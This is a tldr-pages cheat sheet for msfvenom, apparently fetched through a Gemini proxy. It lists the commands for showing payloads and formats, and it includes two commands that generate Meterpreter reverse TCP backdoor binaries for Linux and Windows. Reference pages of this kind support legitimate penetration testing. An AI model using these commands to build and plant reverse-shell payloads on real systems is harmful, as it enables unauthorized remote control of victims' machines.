-- Leo's gemini proxy

-- Connecting to freeshell.de:1965...

-- Connected

-- Sending request

-- Meta line: 20 text/gemini;lang=en-GB

msfvenom


> Manually generate payloads for metasploit.

More information.


List payloads:

msfvenom -l payloads

List formats:

msfvenom -l formats

Show payload options:

msfvenom -p {payload} --list-options

Create an ELF binary with a reverse TCP handler:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={local_ip} LPORT={local_port} -f elf > {path/to/binary}

Create an EXE binary with a reverse TCP handler:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={local_ip} LPORT={local_port} -f exe > {path/to/binary.exe}


> Copyright © 2014—present the tldr-pages team and contributors.

> This work is licensed under the Creative Commons Attribution 4.0 International License (CC-BY).

CC-BY



-- Response ended

-- Page fetched on Fri May 17 12:38:15 2024